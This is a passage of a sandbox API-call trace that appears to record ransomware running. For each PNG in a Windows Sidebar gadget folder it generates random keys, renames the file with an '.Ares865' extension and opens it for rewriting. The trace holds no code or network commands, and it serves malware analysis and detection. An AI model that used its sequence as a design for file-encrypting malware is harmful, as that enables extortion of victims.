pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.275] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.275] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_rest.png.Ares865") returned 105 [0118.276] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_rest.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_rest.png.ares865"), dwFlags=0x1) returned 1 [0118.277] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_left_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_left_rest.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.277] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=855) returned 1 [0118.278] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.278] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.278] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.281] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.282] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.282] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.283] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_disabled.png.Ares865") returned 110 [0118.283] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_disabled.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_disabled.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_disabled.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_disabled.png.ares865"), dwFlags=0x1) returned 1 [0118.285] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_disabled.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_disabled.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.285] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=697) returned 1 [0118.285] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.286] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.286] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.297] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.298] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.298] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.299] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_hover.png.Ares865") returned 107 [0118.299] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_hover.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_hover.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_hover.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_hover.png.ares865"), dwFlags=0x1) returned 1 [0118.301] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_hover.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_hover.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.301] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1047) returned 1 [0118.301] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.302] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.302] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.306] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.307] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.307] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.307] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_pressed.png.Ares865") returned 109 [0118.307] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_pressed.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_pressed.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_pressed.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_pressed.png.ares865"), dwFlags=0x1) returned 1 [0118.309] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_pressed.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_pressed.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.310] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1119) returned 1 [0118.310] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.311] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.311] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.313] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.314] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.314] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.315] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_rest.png.Ares865") returned 106 [0118.315] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_rest.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_rest.png.ares865"), dwFlags=0x1) returned 1 [0118.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\settings_right_rest.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\settings_right_rest.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.317] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=856) returned 1 [0118.317] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.318] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.318] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.321] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.322] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.322] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.322] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\setting_back.png.Ares865") returned 99 [0118.322] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\setting_back.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\setting_back.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\setting_back.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\setting_back.png.ares865"), dwFlags=0x1) returned 1 [0118.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\setting_back.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\setting_back.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.324] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1199) returned 1 [0118.324] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.325] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.325] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.327] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.328] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.328] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.329] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_down.png.Ares865") returned 99 [0118.329] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_down.png.ares865"), dwFlags=0x1) returned 1 [0118.330] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.330] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3471) returned 1 [0118.330] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.331] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.331] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.333] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.334] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.334] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.334] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_over.png.Ares865") returned 99 [0118.334] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_over.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_over.png.ares865"), dwFlags=0x1) returned 1 [0118.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_over.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_over.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.336] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3379) returned 1 [0118.337] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.337] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.337] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.341] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.341] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.341] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_up.png.Ares865") returned 97 [0118.342] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_up.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_up.png.ares865"), dwFlags=0x1) returned 1 [0118.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\shuffle_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\shuffle_up.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.344] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3421) returned 1 [0118.344] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.345] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.345] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.347] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.348] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.348] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.349] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile16.png.Ares865") returned 93 [0118.349] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile16.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile16.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile16.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile16.png.ares865"), dwFlags=0x1) returned 1 [0118.350] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile16.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile16.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.351] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=220) returned 1 [0118.351] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.352] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.352] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.354] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.355] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.355] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.355] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.Ares865") returned 97 [0118.356] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.ares865"), dwFlags=0x1) returned 1 [0118.357] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_bezel.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_bezel.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.357] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3289) returned 1 [0118.357] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.358] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.358] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.360] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.361] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.361] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.Ares865") returned 103 [0118.361] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.ares865"), dwFlags=0x1) returned 1 [0118.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.363] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2883) returned 1 [0118.363] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.364] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.364] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.366] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.367] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.367] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.368] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.Ares865") returned 97 [0118.368] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.ares865"), dwFlags=0x1) returned 1 [0118.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.369] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3388) returned 1 [0118.369] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0118.370] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.370] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.372] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0118.373] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.373] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0118.374] wsprintfW (in: param_1=0x2ccd198, 